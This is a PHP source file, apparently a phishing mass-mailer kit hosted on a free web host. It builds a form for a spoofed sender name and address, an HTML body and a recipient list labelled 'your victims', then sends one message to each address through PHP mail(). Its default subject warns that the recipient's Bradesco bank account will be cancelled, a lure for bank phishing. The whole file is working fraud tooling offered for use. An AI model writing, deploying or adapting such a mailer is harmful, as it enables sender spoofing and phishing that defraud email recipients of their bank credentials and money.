/home/www/waye220labs.50webs.com/Gerpo.php


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
<?php
$testa 
$_POST['veio'];
if(
$testa != "") {

    
$nome $_POST['nome'];

    
$to $_POST['emails'];

    
$headers  "MIME-Version: 1.0\r\n";
    
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
        
$email explode("\n"$to);

    function 
random_num(){
        for(
$x 0$x 4$x++){
        
$n $n rand(1,9);
        }
         return 
mt_rand(1,2) . $n;
        }

        
$de $_POST['de'];
        
$de str_replace("%random_num%"random_num(), $de);
    
$headers .= "From: ".$nome." <".$de.">\r\n";

    
$i 0;
    
$count 1;
        
?>
        <?
    
while($email[$i]) {
        
$message $_POST['html'];
        
$subject $_POST['assunto'];
    
$message str_replace("%EMAIL%"$email[$i], $message);
    
$message str_replace("%random_num%"random_num(), $message);
    
$message str_replace("@hotmail.com"$hot$message);
    
$message str_replace("@terra.com.br"$hot$message);
    
$message str_replace("@uol.com.br"$hot$message);
    
$message str_replace("@yahoo.com.br"$hot$message);
    
$message str_replace("@globo.com"$hot$message);
    
$message str_replace("@ig.com.br"$hot$message);
    
$message str_replace("@bol.com.br"$hot$message);
    
$message str_replace("@oi.com.br"$hot$message);
    
$message str_replace("@gmail.com"$hot$message);
    
$message str_replace("@ubbi.com.br"$hot$message);
    
$message str_replace("@click21.com.br"$hot$message);
    
$message str_replace("@pop.com.br"$hot$message);
    
$message str_replace("@superig.com.br"$hot$message);
    
$message str_replace("@zipmail.com.br"$hot$message);
    
$message str_replace("@msn.com"$hot$message);
    
$message str_replace("@ibest.com.br"$hot$message);
    
$subject str_replace("%random_num%"random_num(), $subject);
    
$subject str_replace("%EMAIL%"$email[$i], $subject);
        
$subject str_replace("@hotmail.com"$hot$subject);
        
$subject str_replace("@terra.com.br"$hot$subject);
        
$subject str_replace("@uol.com.br"$hot$subject);
        
$subject str_replace("@yahoo.com.br"$hot$subject);
        
$subject str_replace("@globo.com"$hot$subject);
        
$subject str_replace("@ig.com.br"$hot$subject);
        
$subject str_replace("@oi.com.br"$hot$subject);
        
$subject str_replace("@bol.com.br"$hot$subject);
        
$subject str_replace("@gmail.com"$hot$subject);
        
$subject str_replace("@ubbi.com.br"$hot$subject);
        
$subject str_replace("@click21.com.br"$hot$subject);
        
$subject str_replace("@pop.com.br"$hot$subject);
        
$subject str_replace("@superig.com.br"$hot$subject);
        
$subject str_replace("@zipmail.com.br"$hot$subject);
        
$subject str_replace("@msn.com"$hot$subject);
        
$subject str_replace("@ibest.com.br"$hot$subject);
        
$ok "ok";
        
$message stripslashes($message);
        if(
mail($email[$i], $subject$message$headers))
        echo 
"* Numero: $count <b>".$email[$i]."</b> <font color=green>OK</font><br><hr>";
        else
        echo 
"* Numero: $count <b>".$email[$i]."</b> <font color=red>ERRO AO ENVIAR</font><br><hr>";
        
$i++;
        
$count++;
    }
    
$count--;
    if(
$ok == "ok")
    echo 
"<script> //alert('Terminaram os emails. ".$count." e-mails enviados'); </script>";
}

?>
<html>

<head>
<title>.: xX L4CR41A Xx :.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>
body {
    background-color: #000;
    margin-left: 0px;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
}
.titulo {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 18px;
    color: #0F0;
    font-weight: bold;
}

.normal {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 12px;
    color: #000000;
}

.form {
    font-family: Arial, Helvetica, sans-serif;
    font-size: 10px;
    color: #333333;
    background-color: #FFFFFF;
    border: 1px dashed #666666;
}

.texto {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-weight: bold;
}

.alerta {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-weight: bold;
    color: #990000;
    font-size: 10px;
}
body,td,th {
    color: #0F0;
}
</style>
</head>
<body>
<center><div style="margin:0 auto;">
<form action="" method="post" enctype="multipart/form-data" name="form1">
  <input type="hidden" name="veio" value="sim">
  <table width="464" height="511" border="0" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC" class="normal">
    <tr>
      <td width="462" height="25" align="center" bgcolor="#000000"><span class="titulo">xX L4CR41A Xx</span></td>
    </tr>
    <tr>
      <td height="194" valign="top" bgcolor="#FFFFFF">
          <table width="100%"  border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
          <tr>
            <td align="right" height="17"><span class="texto">De / e-mail :</span></td>
            <td width="65%" height="17"><input name="nome" type="text" class="form" id="nome"  value="" style="width:48%" > <input name="de" type="text" class="form" id="de" value="" style="width:49%" ></td>
          </tr>
          <tr>
            <td align="right" height="17"><span class="texto">Assunto:</span></td>
            <td height="17"><input name="assunto" type="text" class="form" id="assunto" value="Sua conta Bradesco sera cancelada" style="width:100%" ></td>
          </tr>
          <tr align="center" bgcolor="#000000">
            <td height="20" colspan="2" bgcolor="#000000"><span class="texto">C&oacute;digo HTML:</span></td>
          </tr>
          <tr align="right">
            <td height="146" colspan="2" valign="top"><br>
              <textarea name="html" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html">

 </textarea>
              <span class="alerta">*Lembrete: texto em HTML</span></td>
          </tr>
          <tr align="center" bgcolor="#000000">
            <td height="47" colspan="2"><span class="texto">Coloque o email de suas vitimas abaixo: </span>
              <p><span class="texto">OBS: um e-mail em cima do outro </span></td>
          </tr>
          <tr align="right">
            <td height="136" colspan="2" valign="top"><br>
<textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails">teste@gmail.com</textarea>
              <span class="alerta">*Separado por quebra de linha</span> </td>
          </tr>
          <tr>
            <td height="26" align="right" valign="top" colspan="2"><input type="Submit" id="enviar" name="Submit" value="Enviar"></td>
          </tr>
        </table>
      </td>
    </tr>
    <tr>
      <td height="15" align="center" bgcolor="#000000">&nbsp;</td>
    </tr>
  </table>

</form>
</div></center>
</body>